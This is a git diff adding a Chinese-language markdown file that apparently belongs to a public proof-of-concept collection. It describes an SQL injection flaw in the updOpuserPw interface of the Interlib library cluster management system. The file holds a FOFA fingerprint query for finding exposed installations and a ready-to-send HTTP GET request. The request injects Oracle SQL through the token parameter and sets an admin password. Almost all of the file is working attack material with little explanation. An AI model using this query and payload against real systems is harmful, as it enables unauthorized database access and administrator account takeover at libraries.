diff --git "a/\345\271\277\345\267\236\345\233\276\345\210\233\345\233\276\344\271\246\351\246\206\351\233\206\347\276\244\347\256\241\347\220\206\347\263\273\347\273\237updOpuserPw\346\216\245\345\217\243\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\345\271\277\345\267\236\345\233\276\345\210\233\345\233\276\344\271\246\351\246\206\351\233\206\347\276\244\347\256\241\347\220\206\347\263\273\347\273\237updOpuserPw\346\216\245\345\217\243\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" new file mode 100644 index 0000000..6170b8a --- /dev/null +++ "b/\345\271\277\345\267\236\345\233\276\345\210\233\345\233\276\344\271\246\351\246\206\351\233\206\347\276\244\347\256\241\347\220\206\347\263\273\347\273\237updOpuserPw\346\216\245\345\217\243\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" @@ -0,0 +1,20 @@ +## 广州图创图书馆集群管理系统updOpuserPw接口存在SQL注入漏洞 + + + +## fofa +``` +body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面" +``` + + +## poc +``` +GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*1111111%20from%20dual))=%272 HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 +Accept-Charset: utf-8 +Accept-Encoding: gzip, deflate +Connection: close + +```